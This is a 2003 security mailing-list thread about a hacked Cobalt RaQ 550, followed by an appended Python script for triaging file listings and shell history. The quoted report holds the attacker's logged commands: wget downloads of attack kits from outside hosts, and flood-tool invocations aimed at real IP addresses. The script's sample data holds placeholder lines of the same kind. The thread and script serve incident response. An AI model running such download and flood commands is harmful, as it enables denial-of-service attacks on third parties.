
Re: [cobalt-security] raq 550 hacked



Might be a good idea to contact the owner of the box at prohosting.


----- Original Message -----
From: "Tik & Klik Internetdiensten" <info@xxxxxxxxxx>
To: <cobalt-security@xxxxxxxxxxxxxxx>
Sent: Monday, October 06, 2003 3:14 PM
Subject: [cobalt-security] raq 550 hacked


> Hello,
>
> this weekend it looks like a raq 550 of mine was hacked.
> I tracked some processes that were flooding.
> The program was called vladimII.
>
> It was run under the name of a user that had ssh access.
> When I blocked this user it started a day later with another user.
>
> These 2 users are from different sites on the same machine,
> but these 2 users are from the same person.
> Tracking the ip's I came out in Washington,
> but the user is Dutch so it looks like someone hacked his computer to
> retrieve his passwords?
>
> Is there a way to check if the raq is infected or whether blocking this user
> from ssh will be enough?
> The program that was running was in the /home/tmp dir in the folder flood; a list
> is below.
> The file broadcast.txt has 2102 ip's in it.
>
> I also have saved the bash history of the 2 users.
> There are several programs that were downloaded to my server.
> I shortened the bash history to the programs that were downloaded, below this mail.
>
> Please advise.
>
> ----------
> -rwxr-xr-x 1 xxx users 22446 Feb 9 2001 alpha
> -rwxr-xr-x 1 xxx users 23521 Aug 17 2000 bloop
> -rw-r--r-- 1 xxx users 31909 Aug 22 2001 broadcast.txt
> -rwxr-xr-x 1 xxx users 26981 May 9 01:10 cw
> -rwxr-xr-x 1 xxx users 2250 Apr 11 2001 da.sh
> -rwxr-xr-x 1 xxx users 24747 Mar 10 1996 juno
> -rwxr-xr-x 1 xxx users 25285 Aug 17 2000 nestea
> -rwxr-xr-x 1 xxx users 24577 Oct 3 2000 overdrop
> -rwxr-xr-x 1 xxx users 22803 Oct 17 2000 rc8
> -rwxr-xr-x 1 xxx users 28910 Sep 7 2000 s
> -rwxr-xr-x 1 xxx users 24786 Mar 10 1996 sl
> -rwxr-xr-x 1 xxx users 17027 Feb 9 2001 sl2
> -rwxr-xr-x 1 xxx users 17027 Mar 2 2001 sl3
> -rwxr-xr-x 1 xxx users 17027 Aug 22 2001 slice2
> -rwxr-xr-x 1 xxx users 14883 May 13 2001 slice3
> -rwxr-xr-x 1 xxx users 33962 Oct 17 2000 smack
> -rwxr-xr-x 1 xxx users 31558 Feb 18 2001 smurf5
> -rwxr-xr-x 1 xxx users 39382 Sep 7 2001 smurf6
> -rw-r--r-- 1 xxx users 19008 Aug 22 2001 smurf6-linux+LPG.c
> -rwxr-xr-x 1 xxx users 22158 Aug 6 2000 stealth
> -rwxr-xr-x 1 xxx users 15087 May 13 2001 stream
> -rwxr-xr-x 1 xxx users 15151 May 13 2001 stream2
> -rwxr-xr-x 1 xxx users 23011 Jul 10 00:07 super
> -rwxr-xr-x 1 xxx users 23671 May 13 2001 synhose
> -rwxr-xr-x 1 xxx users 26449 Feb 7 1996 synk
> -rwxr-xr-x 1 xxx users 15687 May 13 2001 synk7
> -rwxr-xr-x 1 xxx users 16519 May 13 2001 synsend
> -rwxr-xr-x 1 xxx users 23587 May 13 2001 trash
> -rwxr-xr-x 1 xxx users 26252 May 13 2001 trash2
> -rwxr-xr-x 1 xxx users 22741 Nov 8 2000 udp
> -rwxr-xr-x 1 xxx users 22446 Aug 22 2001 vadimI
> -rwxr-xr-x 1 xxx users 2635 Aug 22 2001 vadimI.c
> -rwxr-xr-x 1 xxx users 23414 Jun 25 21:52 vadimII
> -rwxr-xr-x 1 xxx users 13607 May 13 2001 xdestroy
> -rwxr-xr-x 1 xxx users 15119 May 13 2001 xshock
>
> -----
> bash history
> wget www.ps-lov.us/pizda.tgz
> wget snow.prohosting.com/muiemuie/p.tar.gz
> wget snow.prohosting.com/muiemuie/p.tgz
> wget snow.prohosting.com/muiemuie/km3.tgz
> wget 65.113.119.133/muiemuie/km3.tgz
>
> It runs programs like
> ./super 69.65.48.23 53 nasa.gov
> ./vadimII 210.0.204.185 53 100000000000000000000000000000000000000 0
> ./cw 210.0.204.185
> ./stealth 210.0.204.185 6500000000000
> ./super 64.207.19.6 53 nasa.gov
>
>
> _______________________________________________
> cobalt-security mailing list
> cobalt-security@xxxxxxxxxxxxxxx
> http://list.cobalt.com/mailman/listinfo/cobalt-security
>
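As a triage aid for the kind of evidence quoted above (an `ls -l` listing of the flood directory and a trimmed bash history), here is an added Python example that is not part of the thread: it parses the listing to flag executables and recently modified files, and pulls the download hosts out of the history for the abuse report the reply suggests. The sample lines, host names and addresses are constructed placeholders, not values from the thread.

```python
import re
from urllib.parse import urlsplit

# Constructed sample input shaped like the listing and trimmed bash history
# quoted in the thread; hosts, IPs and sizes are placeholders.
LS_LISTING = """\
-rwxr-xr-x 1 xxx users 22446 Feb 9 2001 alpha
-rw-r--r-- 1 xxx users 31909 Aug 22 2001 broadcast.txt
-rw-r--r-- 1 xxx users 2635 Aug 22 2001 vadimI.c
-rwxr-xr-x 1 xxx users 23414 Jun 25 21:52 vadimII
"""
BASH_HISTORY = """\
wget dropsite.example/tools/p.tgz
wget 192.0.2.10/tools/km3.tgz
tar xzf km3.tgz
./vadimII 198.51.100.7 53 100000 0
"""

# mode, links, owner, group, size, mtime ("Mon DD YYYY" or "Mon DD HH:MM"), name
LS_RE = re.compile(r"^([-dl][rwxsStT-]{9})\s+\d+\s+(\S+)\s+\S+\s+(\d+)\s+"
                   r"(\w{3}\s+\d{1,2}\s+(?:\d{4}|\d{2}:\d{2}))\s+(.+)$")
FETCH_RE = re.compile(r"^\s*(?:wget|curl)\s+(?:-\S+\s+)*(\S+)")

def parse_ls(listing: str) -> list[dict]:
    out = []  # lines that do not look like `ls -l` output are skipped
    for m in filter(None, (LS_RE.match(l.strip()) for l in listing.splitlines())):
        out.append({"name": m[5], "owner": m[2], "size": int(m[3]),
                    "exec": any(c in "xst" for c in m[1][3::3]),  # user/group/other x bits
                    "recent": ":" in m[4]})  # ls prints HH:MM only for files < ~6 months old
    return out

def find_downloads(history: str) -> list[tuple[str, str]]:
    """(host, path) of every wget/curl fetch: the hosts to name in an abuse report."""
    found = []
    for m in filter(None, map(FETCH_RE.match, history.splitlines())):
        u = urlsplit(m[1] if "://" in m[1] else "http://" + m[1])
        found.append((u.hostname, u.path))
    return found

def triage(listing: str, history: str) -> dict:
    """What an admin needs for cleanup and for the abuse report to the drop site's host."""
    files = parse_ls(listing)
    launched = {l.split()[0][2:] for l in history.splitlines() if l.startswith("./")}
    return {
        "executables": [f["name"] for f in files if f["exec"]],
        "recent": [f["name"] for f in files if f["recent"]],
        "sources": [f["name"] for f in files if f["name"].endswith(".c")],
        "downloads": find_downloads(history),
        "launched": sorted(launched),
    }
```

Feed it the real listing and the users' `.bash_history` instead of the placeholders; the `recent` list is the quickest pointer to what was dropped or rebuilt on the box most recently.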